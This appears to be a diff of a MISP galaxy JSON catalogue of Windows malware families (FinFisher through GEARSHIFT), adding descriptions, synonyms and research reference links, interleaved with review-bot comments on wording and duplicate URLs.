+ 
"https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" ], "synonyms": [ "FinSpy" @@ -8152,6 +15482,19 @@ "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", "value": "Fireball" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.firebird_rat", + "https://twitter.com/casual_malware/status/1237775601035096064" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0d63d92b-6d4d-470d-9f13-acce0c76911c", + "value": "FireBird RAT" + }, { "description": "", "meta": { @@ -8196,9 +15539,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame", - "https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf" + "https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf", + "https://securelist.com/the-flame-questions-and-answers-51/34344/", + "https://www.crysys.hu/publications/files/skywiper.pdf", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache" + ], + "synonyms": [ + "sKyWIper" ], - "synonyms": [], "type": [] }, "uuid": "c40dbede-490f-4df4-a242-a2461e3cfc4e", 
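Review bot: The FinFisher description (hunk starting on L348) is vague where it matters: `It is mostly known for being used in governmental targeted and lawful criminal investigations` restates the vendor's positioning, while the Amnesty and netzpolitik references added in the same hunk appear to document deployments outside that framing. Something like `It is sold to government agencies as a lawful-interception tool; the Amnesty International and netzpolitik.org references document deployments that have drawn criminal complaints and findings in other countries.` would describe the cited sources rather than the marketing. The opening sentence, `It began with few functionalities which included password harvesting and information leakage`, would also read better as `It started with a small feature set (password harvesting, data exfiltration)`.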
@@ -8218,15 +15568,30 @@ "value": "FLASHFLOOD" }, { - "description": "", + "description": "FlawedAmmyy is a well-known Remote Access Tool (RAT) attributed to criminal gang TA505 and used to get the control of target machines. The name reminds the strong link with the leaked source code of Ammyy Admin from which it took the main structure. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", + "https://www.youtube.com/watch?v=N4f2e8Mygag", + "https://habr.com/ru/company/pt/blog/475328/", + "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", + "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930", - "https://github.com/Coldzer0/Ammyy-v3", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://attack.mitre.org/software/S0381/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/", "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", - "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", - "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat" + "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + 
"https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", + "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat" ], "synonyms": [], "type": [] @@ -8239,10 +15604,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://twitter.com/MsftSecIntel/status/1273359829390655488", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", "https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem" ], - "synonyms": [], + "synonyms": [ + "GraceWire" + ], "type": [] }, "uuid": "ef591233-4246-414b-9fbd-46838f3e5da2", 
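Review bot: The new FlawedAmmyy description (hunk starting on L350) ends with a trailing space and `The name reminds the strong link with the leaked source code of Ammyy Admin from which it took the main structure.` is not idiomatic; `The name reflects its strong link to the leaked Ammyy Admin source code, from which it takes its main structure.` says the same thing cleanly. In the FlawedGrace hunk on this line the `GraceWire` synonym is added without a description, so the relationship between the two names is only discoverable through the references; a one-line description naming the reporting vendor would help consumers who see the tag without the refs.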
@@ -8266,14 +15642,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", - "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", - "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", + "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", "http://adelmas.com/blog/flokibot.php", "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/", - "https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/" + "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html" ], "synonyms": [], "type": [] @@ -8281,11 +15656,28 @@ "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", "value": "FlokiBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowcloud", + "https://www.proofpoint.com/us/blog/threat-insight/flowcloud-version-413-malware-analysis", + "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://nao-sec.org/2021/01/royal-road-redive.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b018c5a7-ab70-4df0-b5aa-ceb1efd4b541", + "value": "FlowCloud" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" ], "synonyms": [], 
@@ -8320,6 +15712,32 @@
 "uuid": "79e9df7d-abc8-45bd-abd3-be9b975f1a03",
 "value": "Flusihoc"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flying_dutchman",
+ "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a6f4d003-abe5-46ed-9e71-555b067f4d5a",
+ "value": "FlyingDutchman"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flystudio",
+ "https://www.eset.com/int/about/newsroom/press-releases/announcements/press-threatsense-report-july-2009/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "19228908-ba8b-4718-86b3-209c7f1ae0bf",
+ "value": "FlyStudio"
+ },
 {
 "description": "",
 "meta": {
@@ -8337,21 +15755,50 @@ "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", "value": "Fobber" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix", + "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f8d501bc-cf5a-4e19-a7fa-fb0aac18cc63", + "value": "FONIX" + }, { "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", - "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", - "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", - "https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?", + "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", + "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf", "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", + "https://link.medium.com/uaBiIXgUU8", + "https://usualsuspect.re/article/formbook-hiding-in-plain-sight", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/", + "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent", + "https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html", + "https://isc.sans.edu/diary/26806", + 
"https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", + "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", + "https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?", + "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", - "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", + "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/", - "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf", - "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent", + "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", + "https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", + "https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/", "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" ], "synonyms": [], 
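Review bot: The FormBook `refs` (hunk starting on L354) now carry the same Cyberbit article under two paths (`https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/` and `https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/`) and two Peerlyst URLs with tracking or empty query strings (`?trk=explore_page_resources_recent` and a bare trailing `?`). Stripping tracking parameters and collapsing URLs that differ only by path alias before emitting would keep the array clean and stop consumers from deduplicating by hand.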
@@ -8365,6 +15812,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat",
+ "https://threatvector.cylance.com/en_us/home/breaking-down-ff-rat-malware.html",
 "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/"
 ],
 "synonyms": [
@@ -8375,13 +15823,41 @@
 "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402",
 "value": "FormerFirstRAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fortunecrypt",
+ "https://securelist.com/ransomware-two-pieces-of-good-news/93355/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "02caba7c-1820-40a3-94ae-dc89b5662b3e",
+ "value": "FortuneCrypt"
+ },
+ {
+ "description": "A RAT employing Node.js, Sails, and Socket.IO to collect information on a target",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.frat",
+ "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "695f3381-302f-4fd0-b7a5-4e852291ce91",
+ "value": "FRat"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki",
 "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/",
- "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html"
+ "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
+ "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
+ "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html"
 ],
 "synonyms": [],
 "type": []
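Review bot: The Freenki `refs` in the second hunk of this line now list `https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html` directly above the re-added `http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html`; the two differ only in scheme and name the same article, so the hunk introduces a duplicate rather than a new source. Keeping only the https variant leaves one canonical reference for consumers that deduplicate by string. Since every entry's first ref is a malpedia.caad.fkie.fraunhofer.de link, the duplicate presumably comes from the upstream export and should be reported there too. The Freenki entry's `uuid` and `value` lines are beyond the end of the hunk.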
@@ -8395,25 +15871,71 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/", "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" ], "synonyms": [ - "BitPaymer" + "BitPaymer", + "DoppelPaymer", + "IEncrypt" ], "type": [] }, 
"uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", "value": "FriedEx" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.funnyswitch", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/#id5-2" + ], + "synonyms": [], + "type": [] + }, + "uuid": "58eb97d1-0c29-4596-bd4a-4590b28d988f", + "value": "FunnySwitch" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://nao-sec.org/2021/01/royal-road-redive.html", + "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf", + "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager" + ], + "synonyms": [], + "type": [] + }, + "uuid": "46417b64-928a-43cd-91a6-ecee4c6cd4a7", + "value": "FunnyDream" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim", - "https://sentinelone.com/blogs/sfg-furtims-parent/", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f" + "https://sentinelone.com/blogs/sfg-furtims-parent/" ], "synonyms": [], "type": [] 
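Review bot: The new FunnySwitch entry lists `https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/` twice, the second copy differing only by the `#id5-2` fragment; a fragment does not change the resource, so one of the two should go. In the FriedEx entry the same hunk adds `DoppelPaymer` and `IEncrypt` as synonyms, while the CrowdStrike post added alongside (`doppelpaymer-ransomware-and-dridex-2`) presents DoppelPaymer as a fork that diverged from BitPaymer; if this grouping mirrors the upstream Malpedia family it is acceptable, but downstream tagging will then label DoppelPaymer samples as FriedEx, which is worth a short comment in the commit description. The Furtim entry's `uuid` and `value` lines lie past the end of the hunk.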
@@ -8421,6 +15943,33 @@
 "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1",
 "value": "Furtim"
 },
+ {
+ "description": "FuxSocy has some similarities to win.cerber but is tracked as its own family for now.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy",
+ "http://id-ransomware.blogspot.com/2019/10/fuxsocy-encryptor-ransomware.html",
+ "https://www.bleepingcomputer.com/news/security/new-fuxsocy-ransomware-impersonates-the-notorious-cerber/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "289b4ffd-d406-44b1-99d4-3406dfd24adb",
+ "value": "FuxSocy"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gacrux",
+ "https://krabsonsecurity.com/2020/10/24/gacrux-a-basic-c-malware-with-a-custom-pe-loader/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "551140ca-001b-49d8-aa06-82a5aebb02dd",
+ "value": "Gacrux"
+ },
 {
 "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n",
 "meta": {
@@ -8465,14 +16014,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p",
- "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf",
 "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf",
- "https://www.wired.com/?p=2171700",
+ "https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf",
+ "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
+ "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
 "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
- "https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf"
+ "https://www.wired.com/?p=2171700",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.lawfareblog.com/what-point-these-nation-state-indictments"
 ],
 "synonyms": [
 "GOZ",
+ "Mapp",
 "ZeuS P2P"
 ],
 "type": []
@@ -8493,25 +16048,52 @@ "value": "Gamotrol" }, { - "description": "", + "description": "GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.\r\n\r\nIn a surprising announcement on May 31, 2019, the GandCrab\u2019s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If there\u2019s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/", - "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", + "https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom", + "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", + "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/", + 
"https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/", "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", - "http://asec.ahnlab.com/1145", - "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", + "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", "https://isc.sans.edu/diary/23417", - "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html", - "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", - "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", - "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-garden", + "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", 
"https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/", - "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom" + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/", + "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "http://asec.ahnlab.com/1145", + "https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html", + "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", + "https://vimeo.com/449849549", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/", + "https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf" ], "synonyms": [ "GrandCrab" 
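Review bot: The GandCrab description added in this hunk has several wording slips that MISP will render verbatim: `was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018` should read `was a Ransomware-as-a-Service (RaaS) that emerged on January 28, 2018`, `the GandCrab\u2019s operators` should drop the article, and `However, If there\u2019s one thing` needs a lowercase `if`. The rest of the hunk reorders and extends `refs` without changing their content. The GandCrab entry's `type`, `uuid` and `value` lines lie past the end of the hunk.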
@@ -8552,10 +16134,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer",
- "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/",
 "https://securelist.com/introducing-whitebear/81638/",
 "https://www.youtube.com/watch?v=Pvzhtjl86wc",
+ "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
+ "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/",
 "https://github.com/eset/malware-ioc/tree/master/turla",
+ "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/",
 "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf"
 ],
 "synonyms": [
@@ -8584,7 +16168,6 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer",
- "https://www.rekings.com/ispy-customers/",
 "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html"
 ],
 "synonyms": [],
@@ -8593,6 +16176,19 @@
 "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128",
 "value": "GearInformer"
 },
+ {
+ "description": "According to FireEye, GEARSHIFT is a memory-only dropper for two keylogger DLLs. It is designed to replace a legitimate Fax Service DLL.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearshift",
+ "https://content.fireeye.com/apt-41/rpt-apt41/"
